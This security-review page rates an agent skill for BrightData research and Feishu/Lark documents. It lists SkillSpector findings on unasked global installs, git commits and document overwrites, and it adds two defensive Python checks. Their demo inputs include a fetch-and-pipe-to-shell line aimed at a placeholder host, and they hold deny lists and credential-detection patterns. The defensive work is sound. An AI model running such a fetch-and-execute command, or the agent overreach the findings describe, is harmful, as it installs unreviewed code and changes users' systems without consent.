brightdata-research

Security checks across malware telemetry and agentic risk

Overview

The skill mostly matches its advertised research-to-Feishu workflow, but it also allows automatic global installs, adding external skills, and git repository changes without enough user control.

Install only if you are comfortable with an agent using BrightData, reading/writing Feishu or Lark documents as your user, and modifying the local environment. Before use, require manual approval for npm global installs, adding Lark skills, any git init or commit, and any document replace operation; prefer Markdown-only output or serial execution when you do not want those side effects.
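One way to enforce that approval boundary in an agent harness, as an added example that is not part of the skill or of the SkillSpector report: a gate that tokenizes each shell command the agent proposes, splits it at `;`, `&&`, `||` and `|`, and holds for manual approval any segment that is a global package install, an `npx skills add`, a `git init`/`commit`/`worktree`, a document `replace`, or an opaque wrapper such as `bash -c`, `eval` or `sudo` that hides what actually runs. The `lark-cli ... replace` command shape is an assumption used for illustration; the real CLI's arguments may differ.

```python
"""Approval gate for shell commands an agent skill proposes to run.

Added example, not part of the brightdata-research skill or the SkillSpector
report. It encodes the overview's advice: let ordinary commands through, but
hold global package installs, `npx skills add`, git init/commit/worktree and
document replace operations for manual approval. The `lark-cli ... replace`
command shape is an assumption; the real CLI's arguments may differ.
"""
import shlex
from dataclasses import dataclass, field

CONTROL_OPS = {";", "&&", "||", "|", "&", "(", ")"}
SHELLS = {"sh", "bash", "zsh", "dash", "eval", "source", "."}
WRAPPERS = {"sudo", "env", "command", "nohup", "time"}


@dataclass
class Decision:
    command: str
    reasons: list = field(default_factory=list)

    @property
    def allowed(self) -> bool:
        return not self.reasons


def split_commands(cmd: str) -> list:
    """Tokenize a shell line and split it at control operators.

    punctuation_chars makes shlex emit ';', '&&', '||' and '|' as separate
    tokens, so `git add -A && git commit -m x` yields two simple commands."""
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    segments, current = [], []
    for tok in lex:
        if tok in CONTROL_OPS:
            if current:
                segments.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        segments.append(current)
    return segments


def check_segment(argv: list) -> list:
    """Return the reasons one simple command needs approval (empty = auto-run)."""
    reasons = []
    while argv and argv[0] in WRAPPERS:        # sudo / env VAR=1 / nohup ...
        if argv[0] == "sudo":
            reasons.append("privilege escalation via sudo")
        argv = argv[1:]
        while argv and "=" in argv[0] and not argv[0].startswith("-"):
            argv = argv[1:]                    # drop leading VAR=value words
    if not argv:
        return reasons
    prog, args = argv[0], argv[1:]
    if prog in SHELLS:
        reasons.append(f"opaque shell invocation ({prog}): nested command is not inspectable")
    elif prog in {"npm", "pnpm"} and args and args[0] in {"install", "i", "add"} \
            and {"-g", "--global"} & set(args):
        reasons.append("global package install: " + " ".join(argv))
    elif prog == "yarn" and args[:2] == ["global", "add"]:
        reasons.append("global package install: " + " ".join(argv))
    elif prog == "npx" and args[:2] == ["skills", "add"]:
        reasons.append("adds an external skill package: " + " ".join(argv))
    elif prog == "git" and args and args[0] in {"init", "commit", "worktree"}:
        reasons.append("durable repository change: git " + args[0])
    elif prog == "lark-cli" and "replace" in args:   # assumed CLI shape
        reasons.append("document replace overwrites the full Feishu/Lark document")
    return reasons


def review(cmd: str) -> Decision:
    """Gate a whole command line: every chained or piped segment is checked."""
    decision = Decision(cmd)
    for segment in split_commands(cmd):
        decision.reasons.extend(check_segment(segment))
    return decision


if __name__ == "__main__":
    for line in ["git status",
                 "git add -A && git commit -m 'initial research'",
                 "sudo npm install -g @brightdata/cli",
                 "curl https://example.invalid/setup.sh | sh"]:
        d = review(line)
        print("AUTO " if d.allowed else "HOLD ", line, d.reasons)
```

Chained commands are split on purpose: `git add -A && git commit` hides the durable step behind a harmless one, and a pipe into `sh` hides the script entirely, so nested shells are held rather than parsed. A local (non-global) `npm install` passes this gate because the overview singles out global installs, but it still pulls unreviewed registry code, so a stricter site policy may hold it as well.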

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Supply Chain: Unpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger Abuse: Overly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
Findings (15)

Context-Inappropriate Capability

Medium
Confidence: 94%
Finding
The checklist explicitly authorizes automatic installation of a global CLI (`npm install -g @brightdata/cli`) and steers the operator into authentication setup, which expands the skill from research orchestration into host modification and credential onboarding. That is dangerous because it changes the local environment and widens the trust boundary in ways the skill's core task does not clearly justify, especially when run without explicit per-action user consent.

Context-Inappropriate Capability

Medium
Confidence: 95%
Finding
The Lark section permits automatic installation of `lark-cli` and related skills, broadening the skill’s operational scope to persistent system changes and third-party tooling setup. In a skill that should organize research outputs, silently expanding into CLI deployment and configuration increases supply-chain and environment-tampering risk.

Context-Inappropriate Capability

Medium
Confidence: 97%
Finding
Automatically running `git init` and creating a commit is outside the declared batch-research workflow and modifies project state in a durable way. This is risky because it can alter repository history, interfere with existing workflows, and create misleading provenance or accidental inclusion of sensitive files in commits.

Context-Inappropriate Capability

Medium
Confidence: 95%
Finding
The fallback guidance tells the agent to automatically install global CLIs (`@brightdata/cli`, `@larksuite/cli`) as part of error handling, which expands the skill from research/document work into system modification. In an agent setting, unattended package installation can change the host environment, pull untrusted code from registries, and create persistence or supply-chain risk without explicit user consent.

Context-Inappropriate Capability

Medium
Confidence: 92%
Finding
The document permits automatic git initialization, initial commit, and worktree-related repository setup when subagent/worktree fails. That is outside the stated batch-research-and-docs scope and can silently alter a user's filesystem and repository history, which is risky in environments where the agent should not mutate project state unless clearly authorized.

Vague Triggers

Medium
Confidence: 84%
Finding
The trigger language is very broad and encourages automatic activation for loosely related requests, which can cause the skill to run web scraping, deduplication, and Feishu write actions when the user did not clearly intend that full workflow. In an agent setting, ambiguous activation boundaries increase the risk of over-collection, unintended third-party access, and writes to external documents without sufficiently explicit confirmation.

Missing User Warnings

Medium
Confidence: 89%
Finding
The README promotes a pipeline that performs web scraping/search and writes results into Feishu, but it does not clearly warn about data handling, third-party disclosure, or the possibility of copying sensitive user-provided information into external services. In practice, this omission can lead users or downstream agents to process personal, confidential, or regulated data without informed consent or policy checks.

Vague Triggers

Medium
Confidence: 90%
Finding
The trigger description is broad enough to activate on ordinary research or document-maintenance requests, including cases where the user does not explicitly name the skill. That can cause overbroad invocation of a capability that performs batch web research, deduplication, and Feishu/Lark document writes, increasing the chance of unintended external access or modification of user documents.

Missing User Warnings

Medium
Confidence: 93%
Finding
The checklist allows automatic global package installation without an explicit warning that the action will modify the host system. Even if intended as convenience, executing package-manager commands can introduce unreviewed software, change PATH-resolved binaries, and violate least surprise for the user.

Missing User Warnings

Medium
Confidence: 91%
Finding
The checklist references API token configuration and login flows but provides no privacy warning about credential sensitivity, storage location, or handling expectations. This is dangerous because it normalizes credential setup in an automated workflow without clarifying that secrets must not be exposed, logged, or requested unnecessarily.

Missing User Warnings

Medium
Confidence: 96%
Finding
Allowing automatic `git init` and `git add -A && git commit` without warning is unsafe because it creates persistent repository/history changes and may capture unrelated or sensitive files. In the context of a research skill, this behavior is unnecessary by default and materially increases the chance of unintended data exposure or workspace corruption.

Missing User Warnings

Medium
Confidence: 96%
Finding
The guidance to automatically run `npm install -g @brightdata/cli` lacks an explicit warning that it will modify the system by installing global software. In an automated agent workflow, this can surprise users, violate least-privilege expectations, and expose the machine to package-registry or dependency compromise.

Missing User Warnings

Medium
Confidence: 96%
Finding
The fallback instructs automatic installation of `@larksuite/cli` and a skill package via `npx skills add` without warning the user about system changes or the trust implications of pulling packages from external sources. This creates both environment-modification risk and a software supply-chain exposure path unrelated to the core task unless the user has explicitly approved setup actions.

Missing User Warnings

Medium
Confidence: 93%
Finding
Allowing automatic git initialization and an initial commit without a clear warning permits silent repository mutation. Even if intended as a convenience fallback, creating a repo and commit can interfere with user workflows, alter audit/history expectations, and cause accidental disclosure or staging of files.
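A check that supplies the warning these git findings say is missing (this one and the earlier finding on automatic `git add -A && git commit`), and that also addresses the credential-handling finding above, since a research workspace tends to accumulate the BrightData token and `.npmrc` auth entries that `git add -A` would sweep in. Added example, not code from the skill or from the SkillSpector report: before the agent is allowed to commit, the staged file list (what `git diff --cached --name-only -z` prints) is screened for credential-bearing filenames and token-shaped assignments. The path patterns, the regex and the sample workspace are constructed for this example.

```python
"""Pre-commit screen for an agent that would otherwise run `git add -A && git commit`.

Added example, not from the brightdata-research skill or the SkillSpector
report. Before the agent may commit, the staged paths are checked for
credential-bearing filenames and token-shaped assignments. The path
patterns, the regex and the sample workspace below are constructed for this
example; they are a starting point, not a complete secret scanner.
"""
import fnmatch
import re
import subprocess

# Filenames that should never be swept into a research commit.
SENSITIVE_PATHS = [
    ".env", ".env.*", "*.pem", "*.key", "*.p12", "*.pfx", "id_rsa", "id_ed25519",
    ".npmrc", ".netrc", "credentials", "credentials.json", "*.tfstate", "*.kdbx",
]
# key = value / key: value lines whose key names a credential and whose value
# is at least 8 non-space characters (assumed shape; tune for your tokens).
TOKEN_RE = re.compile(
    r"(?i)(api[_-]?token|auth[_-]?token|_authToken|api[_-]?key|secret|password)"
    r"\s*[:=]\s*\S{8,}"
)


def blocked_paths(staged, read_file):
    """Map each staged path that must not be committed to the reason.

    `read_file(path) -> str` is injected so the check runs on a real tree or
    on the in-memory sample below."""
    blocked = {}
    for path in staged:
        name = path.rsplit("/", 1)[-1]
        pattern = next((p for p in SENSITIVE_PATHS if fnmatch.fnmatch(name, p)), None)
        if pattern:
            blocked[path] = f"filename matches {pattern}"
            continue
        try:
            text = read_file(path)
        except (OSError, UnicodeDecodeError):
            continue          # binary or unreadable: only the filename check applies
        match = TOKEN_RE.search(text)
        if match:
            blocked[path] = f"token-like assignment: {match.group(1)}"
    return blocked


def commit_allowed(staged, read_file):
    """True when nothing staged trips the screen; otherwise hold for the user."""
    return not blocked_paths(staged, read_file)


def staged_from_git(repo="."):
    """Staged paths of a real repository (what `git add -A` just put in the index)."""
    out = subprocess.run(
        ["git", "-C", repo, "diff", "--cached", "--name-only", "-z"],
        capture_output=True, text=True, check=True).stdout
    return [p for p in out.split("\0") if p]


def read_from_disk(path):
    with open(path, encoding="utf-8") as fh:
        return fh.read()


# Constructed sample workspace: the kind of tree a research run leaves behind.
SAMPLE_TREE = {
    "research/brightdata-results.md": "# Results\n- https://example.invalid/page ...\n",
    ".npmrc": "//registry.npmjs.org/:_authToken=npm_EXAMPLEEXAMPLE0000\n",
    "scripts/run.sh": "export BRIGHTDATA_API_TOKEN=bd_EXAMPLE1234567890\n",
    "notes/todo.txt": "password policy: rotate every 90 days\n",
}


if __name__ == "__main__":
    hits = blocked_paths(list(SAMPLE_TREE), SAMPLE_TREE.__getitem__)
    for path, why in hits.items():
        print(f"refusing to commit {path}: {why}")
    print("commit allowed" if not hits else "commit held for review")
```

On a real checkout the agent's commit step becomes `commit_allowed(staged_from_git(), read_from_disk)`; a `False` result is the moment to show the user the blocked paths instead of committing. The `notes/todo.txt` line shows why the regex insists on an assignment form: prose that merely mentions a password is not a secret, while `.npmrc` is held on filename alone without reading it.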

Missing User Warnings

Medium
Confidence: 94%
Finding
The skill documentation explicitly describes a `replace` mode that overwrites the full contents of a Feishu/Lark document, but it includes no warning, confirmation requirement, backup guidance, or safe-use constraint. In a batch research skill that appends to and updates shared documents, this raises the risk of accidental destructive modification of user data if the command is copied or operationalized without caution.

VirusTotal

All 64 of 64 vendors reported this skill as clean.
